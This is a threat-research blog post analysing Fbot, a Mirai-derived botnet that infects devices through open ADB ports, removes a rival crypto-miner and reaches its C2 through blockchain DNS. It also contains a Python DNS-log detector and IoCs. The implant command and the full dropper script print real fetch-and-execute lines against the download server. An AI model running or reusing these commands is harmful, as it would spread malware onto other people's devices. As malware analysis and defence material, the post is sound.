Fbot, A Satori Related Botnet Using Block-chain DNS System

Since 2018-09-13 11:30 UTC, a new botnet (we call it Fbot) has popped up on our radar, and it really caught our attention.

There are 3 interesting aspects about this new botnet:

  • First, so far the only purpose of this botnet appears to be hunting down and removing another botnet, com.ufo.miner.
  • Second, the bot does not use traditional DNS to communicate with the C2; instead, it uses block-chain DNS to resolve the non-standard C2 name musl.lib (see below for details).
  • Third, this bot appears to have strong links to the original Satori botnet (see below for details).

com.ufo.miner is a variant of the ADB.Miner crypto-mining malware family, which targets adb (Android Debug Bridge). We first reported ADB.Miner on our blog this February, and since then this botnet family has infected a variety of equipment such as Amazon FireTV.

Analysis

Fbot spreads using the same mechanism used by earlier ADB.Miner.

The implant payload downloads and executes one of the following two scripts:

  • hxxp://188.209.52.142/c
  • or hxxp://188.209.52.142/w

These two scripts are almost identical; the only difference is that one uses wget and the other uses curl. The scripts do the following:

  • Download the core payload fbot.{arch} from 188.209.52.142, which embeds the C2 musl.lib.
  • Uninstall com.ufo.miner
  • Self-cleaning

The fbot.{arch} is a Mirai variant. Its features include:

  • C2: a blockchain domain, musl.lib, on port 7000; EmerDNS currently resolves it to 66.42.57.45 (SINGAPORE/SG Singapore).
  • Scan and propagate: scans TCP port 5555 for the ADB service and instructs victims to download hxxp://188.209.52.142/c through the adb interface.
  • House cleaning: the sample looks for and kills specific processes by checking /proc/<pid>/exe, such as SMI, Xig, rig, and so on.

This variant still keeps the DDoS module from Mirai, but we have not logged any DDoS attack command from the C2 so far.

The C2 in the fbot.{arch}:

The scanning and implanting payload:

shell:cd /data/local/tmp/; busybox wget hxxp://188.209.52.142/w -O -> w; sh w; rm w; curl http://188.209.52.142/c > c; sh c; rm c

The process list to be killed:

/data/local/tmp/smi
/data/local/tmp/xig
/data/local/tmp/trinity
/data/local/tmp/z
/data/local/tmp/log
/data/local/tmp/rig
/data/local/tmp/.f
/data/local/tmp/tyg

The C2 musl.lib

The C2 domain musl.lib is not a standard DNS domain name. Its top-level domain .lib is NOT registered with ICANN and cannot be resolved by the traditional DNS system.

This domain name is resolved by EmerDNS, Emercoin.com's blockchain-based DNS system. According to its website, it is built on block-chain technology and is fully decentralized.

There are several options when users want to access a .lib web site:

  • Through OpenNIC, which relays DNS requests between users and the EmerDNS system.
  • By installing a specific browser extension.
  • By setting up an Emer node themselves.

Fbot hard-codes a list of OpenNIC DNS server IP addresses. The hard-coded servers include at least the following:

176.126.70.119
163.53.248.170
174.138.48.29
5.132.191.104
107.172.42.186
163.172.168.171
174.138.48.29
185.208.208.141
163.53.248.170
5.132.191.104

Currently the EmerDNS resolution of musl.lib is as follows:

https://explorer.emercoin.com/nvs//musl.lib//25/1/1

Readers can use the following commands to reproduce the resolution process:

user@netlab.360.com$dig musl.lib @seed2.emercoin.com +short
66.42.57.45

Fbot's choice of EmerDNS over traditional DNS is pretty interesting. It raises the bar for security researchers trying to find and track the botnet (security systems that only look for traditional DNS names will miss it), and it also makes the C2 domain harder to sinkhole, since the usual takedown mechanisms available through ICANN members do not apply.
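The detection point above (a resolver that only knows ICANN TLDs never sees musl.lib answered, and the bot talks to hard-coded OpenNIC relays instead of the local resolver) can be turned into a simple DNS-log check. The following is an added example written for this article, not code from 360 Netlab or from the Fbot samples. It assumes a constructed log line format (`<timestamp> <client_ip> -> <resolver_ip>:53 Q <qname> <qtype>`), an assumed organisational resolver allowlist (`10.0.0.53`), the OpenNIC relay addresses listed above, and the blockchain TLDs served by EmerDNS (.coin, .emc, .lib, .bazar) and Namecoin (.bit). It goes slightly beyond the article by flagging any query to a resolver outside the allowlist, not only the Fbot relays.

```python
import re
from collections import namedtuple

# TLDs served by blockchain naming systems rather than the ICANN root zone.
# EmerDNS serves .coin, .emc, .lib and .bazar; Namecoin serves .bit.
BLOCKCHAIN_TLDS = {"lib", "coin", "emc", "bazar", "bit"}

# OpenNIC relay addresses the analysis above lists as hard-coded in Fbot.
FBOT_HARDCODED_RESOLVERS = {
    "176.126.70.119", "163.53.248.170", "174.138.48.29", "5.132.191.104",
    "107.172.42.186", "163.172.168.171", "185.208.208.141",
}

# Assumption: the organisation's own resolvers, the only ones hosts should talk to.
ALLOWED_RESOLVERS = {"10.0.0.53"}

# Assumed, constructed log format:
# "<timestamp> <client_ip> -> <resolver_ip>:53 Q <qname> <qtype>"
LOG_RE = re.compile(
    r"^(?P<ts>\S+) (?P<src>[\d.]+) -> (?P<dst>[\d.]+):53 Q (?P<qname>\S+) (?P<qtype>\S+)$"
)

Finding = namedtuple("Finding", "src qname dst reasons")


def analyse_line(line):
    """Return a Finding for one log line, or None when nothing is suspicious."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    qname = m["qname"].rstrip(".").lower()
    tld = qname.rsplit(".", 1)[-1]
    reasons = []
    if tld in BLOCKCHAIN_TLDS:
        # A name under a blockchain TLD can only be answered by a
        # blockchain-aware resolver; a normal resolver returns NXDOMAIN.
        reasons.append(f"blockchain TLD .{tld}")
    if m["dst"] in FBOT_HARDCODED_RESOLVERS:
        reasons.append("query sent to OpenNIC relay hard-coded in Fbot")
    elif m["dst"] not in ALLOWED_RESOLVERS:
        reasons.append("query bypasses allowed resolvers")
    if not reasons:
        return None
    return Finding(m["src"], qname, m["dst"], tuple(reasons))


def analyse_log(lines):
    """Run analyse_line over an iterable of log lines and keep the findings."""
    return [f for f in (analyse_line(l) for l in lines) if f is not None]


# Constructed sample log (RFC 5737 client addresses, not real observations).
SAMPLE_LOG = [
    "2018-09-13T11:30:00Z 192.0.2.10 -> 10.0.0.53:53 Q www.example.com. A",
    "2018-09-13T11:30:05Z 192.0.2.10 -> 176.126.70.119:53 Q musl.lib. A",
    "2018-09-13T11:30:09Z 192.0.2.11 -> 8.8.8.8:53 Q updates.example.net. A",
    "2018-09-13T11:31:00Z 192.0.2.12 -> 10.0.0.53:53 Q wallet.example.bit. A",
]

if __name__ == "__main__":
    for f in analyse_log(SAMPLE_LOG):
        print(f"{f.src} -> {f.dst} {f.qname}: {'; '.join(f.reasons)}")
```

The second sample line reproduces the Fbot pattern (a .lib name asked of a hard-coded OpenNIC relay) and triggers both checks; the last line shows that a blockchain-TLD lookup is worth flagging even when it goes to the sanctioned resolver, because the NXDOMAIN it receives is itself a sign that a host is trying to reach a name the traditional DNS tree cannot serve.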

The Relationship between Fbot and Satori

The following diagram shows the relationship between the Fbot and the Satori botnet:

In the figure above:

  • The Fbot C2 IP is currently 66.42.57.45, which resolves to 4eouhp79tl5zqs2tbqee.ukrainianhorseriding.com, and ukrainianhorseriding.com's registration email is village@riseup.net.
  • village@riseup.net also owns rippr.cc, which is the C2 for the Satori botnet.

IP 27.102.115.44 is also connected to Fbot.

  • Via the domain name 4eouhp79tl5zqs2tbqee.ukrainianhorseriding.com.
  • The URL pattern on this IP is consistent with the URL pattern of the Fbot download server 188.209.52.142; see the IoC section at the end of the article for details.

Taken together, we think the domain names, IPs, URLs and samples presented in the figure form a strongly inter-connected cluster, and that Fbot has a very strong link with Satori.

Contact Us

Readers can reach us on our twitter, WeChat 360Netlab or email to netlab at 360 dot cn.

IoC

Download Server

188.209.52.142 Netherlands/NL	AS49349

C2 Server

musl.lib         #C2 domain, resolved by EmerDNS, a block-chain DNS
musl.lib:7000 currently resolves to 66.42.57.45:7000    #Singapore/SG Singapore, current C2 IP and port
ukrainianhorseriding.com #Related C2 domain
27.102.115.44    Republic of Korea/KR    AS45996 #Related C2 IP
rippr.cc         #Related domain, a Satori C2

Downloading URL

hxxp://188.209.52.142/c          #Script, will download and execute fbot.{arch}, uninstall com.ufo.miner, and do clean work
hxxp://188.209.52.142/w          #Script, will download and execute fbot.{arch}, uninstall com.ufo.miner, and do clean work
hxxp://188.209.52.142/fbot.aarch64     #Scanners, will spread itself in a worm style
hxxp://188.209.52.142/fbot.arm7
hxxp://188.209.52.142/fbot.mips
hxxp://188.209.52.142/fbot.mipsel
hxxp://188.209.52.142/fbot.x86
hxxp://188.209.52.142/fbot.x86_64
hxxp://27.102.115.44/c          #Historically related scripts
hxxp://27.102.115.44/w
hxxp://27.102.115.44/mipsel.bot.le
hxxp://27.102.115.44/mips.bot.be
hxxp://27.102.115.44/i686.bot.le
hxxp://27.102.115.44/arm7.bot.le
hxxp://27.102.115.44/arm64.bot.le
hxxp://27.102.115.44/x86_64.bot.le
hxxp://27.102.115.44/adbs
hxxp://27.102.115.44/adbs2
hxxp://27.102.115.44/

One of the Scripts

#!/system/bin/sh

n="arm7 mipsel mips x86 x86_64 aarch64"
http_server="188.209.52.142"

for i in $n
do
    cp /system/bin/sh fbot.$i
    >fbot.$i
    curl hxxp://$http_server/fbot.$i > fbot.$i   #    wget hxxp://$http_server/fbot.$i > fbot.$i
    chmod 777 fbot.$i
    ./fbot.$i
    rm fbot.$i
done

# Cleanup
for i in $n
do
    rm fbot.$i
done

pm uninstall com.ufo.miner

# Suicide
rm $0